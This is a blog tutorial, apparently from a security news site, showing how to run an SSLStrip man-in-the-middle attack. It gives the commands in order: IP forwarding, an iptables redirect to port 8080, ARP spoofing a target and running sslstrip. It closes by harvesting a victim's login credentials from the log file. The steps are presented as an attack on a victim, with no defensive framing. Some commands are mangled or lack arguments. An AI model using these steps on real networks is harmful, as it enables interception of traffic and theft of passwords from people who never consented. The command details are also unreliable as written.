Tuesday, March 19, 2024

MITM attack over HTTPS connection with SSLStrip

MITM attack with SSLStrip transparently hijack HTTP traffic on a network, look for HTTPS links and redirects, then map those connections into either resembles the other alike HTTP connections or homograph-comparable HTTPS links.

It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Also Read: Top 5 Best Android Hacking Apps 2017

Step 1: We should set our machine in forwarding mode so that our machine has the capacity to forward each packet that was not expected for your machine.

echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2: Need to set iptables to redirect traffic from port 80 to port 8080 to ensure outgoing connections to sslstrip.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

Step 3: Need to find our Network Gateway.

route -n

MITM attack over HTTPS connection with SSLStrip

Step 4: Next we need to find our target machine’s IP address

MITM attack over HTTPS connection with SSLStrip

Step 5: ARP spoofing is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network.

arpspoof -i -t

MITM attack over HTTPS connection with SSLStrip

Step6: Now we need to listen to port 8080, by opening a new terminal window.

sslstrip -l 8080

MITM attack over HTTPS connection with SSLStrip

Step 7: Now we should go to the victim machine and for Ex type facebook.com in the browser as we know Facebook will go with HTTPS, but now check with the victim machine, we can see the connection established through HTTP.

MITM attack over HTTPS connection with SSLStrip
MITM attack over HTTPS connection with SSLStrip

Step8: Now go to the Home folder and check for the sslstrip.log file, we can find the username and password the victim entered for login.

MITM attack over HTTPS connection with SSLStrip

That’s all we have cracked our victim’s credentials.

If you have any doubt please don’t hesitate to leave a comment.

Also, find more Tutorials with Kali Linux

Website

Latest articles

Researchers Hack AI Assistants Using ASCII Art

Large language models (LLMs) are vulnerable to attacks, leveraging their inability to recognize prompts...

Microsoft Deprecate 1024-bit RSA Encryption Keys in Windows

Microsoft has announced an important update for Windows users worldwide in a continuous effort...

Beware Of Free wedding Invite WhatsApp Scam That Steal Sensitive Data

The ongoing "free wedding invite" scam is one of several innovative campaigns aimed at...

Hackers Using Weaponized SVG Files in Cyber Attacks

Cybercriminals have repurposed Scalable Vector Graphics (SVG) files to deliver malware, a technique that...

New Acoustic Keyboard Side Channel Attack Let Attackers Steal Sensitive Data

In recent years, personal data security has surged in importance due to digital device...

Discontinued WordPress Plugin Flaw Exposes Websites to Cyber Attacks

A critical vulnerability was discovered in two plugins developed by miniOrange.The affected plugins,...

ShadowSyndicate Hackers Exploiting Aiohttp Vulnerability To Access Sensitive Data

A new Aiohttp vulnerability has been discovered, which the threat actor ShadowSyndicate exploits.Aiohttp...
Guru baran
Guru baranhttps://gbhackers.com
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles